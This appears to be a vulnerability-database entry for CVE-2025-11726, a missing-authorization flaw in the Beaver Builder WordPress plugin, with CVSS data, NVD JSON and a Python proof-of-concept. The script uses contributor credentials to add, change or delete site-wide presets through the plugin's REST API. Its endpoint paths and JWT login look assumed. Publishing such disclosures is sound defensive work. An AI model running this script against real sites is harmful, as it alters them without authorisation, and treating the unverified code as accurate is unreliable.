Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11726 CVSS 4.3 MEDIUM

CVE-2025-11726

Published: 2025-12-02 08:15:51
Last Modified: 2025-12-11 20:27:36
Source: [email protected]

Description

The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:* - VULNERABLE
Beaver Builder WordPress Page Builder <= 2.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2025-11726 PoC - Beaver Builder Missing Authorization Target: WordPress site with Beaver Builder plugin <= 2.9.4 Authentication: Contributor+ role required ''' import requests import json import sys # Configuration TARGET_URL = "https://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" # API Endpoints under fl-controls/v1 namespace API_BASE = f"{TARGET_URL}/wp-json/fl-controls/v1" def get_auth_token(): """Get WordPress REST API authentication token""" login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token" data = {"username": USERNAME, "password": PASSWORD} response = requests.post(login_url, json=data) if response.status_code == 200: return response.json().get("token") return None def add_global_preset(token): """Add malicious global color preset - unauthorized action""" headers = {"Authorization": f"Bearer {token}"} preset_data = { "type": "color", "name": "Malicious Preset", "value": "#malicious_color" } response = requests.post( f"{API_BASE}/presets", headers=headers, json=preset_data ) return response def modify_global_preset(token, preset_id): """Modify existing global preset - unauthorized action""" headers = {"Authorization": f"Bearer {token}"} update_data = { "name": "Modified Preset", "value": "#modified_color" } response = requests.put( f"{API_BASE}/presets/{preset_id}", headers=headers, json=update_data ) return response def delete_global_preset(token, preset_id): """Delete global preset - unauthorized action""" headers = {"Authorization": f"Bearer {token}"} response = requests.delete( f"{API_BASE}/presets/{preset_id}", headers=headers ) return response def main(): print("[*] CVE-2025-11726 PoC - Beaver Builder Authorization Bypass") token = get_auth_token() if not token: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully with Contributor role") # Add malicious preset resp = add_global_preset(token) if resp.status_code in [200, 201]: print("[+] Successfully added malicious global preset (Unauthorized!)") print(f"[*] Response: {resp.json()}") else: print(f"[-] Failed to add preset: {resp.status_code}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11726", "sourceIdentifier": "[email protected]", "published": "2025-12-02T08:15:51.343", "lastModified": "2025-12-11T20:27:36.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding": "2.9.4.1", "matchCriteriaId": "3CC303E8-BD30-4426-8AB7-58F4CA9E9630"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L252", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L53", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406987%40beaver-builder-lite-version&new=3406987%40beaver-builder-lite-version&sfp_email=&sfph_mail=", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b797e141-a9d2-48c4-a44e-a59a80a90a5b?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.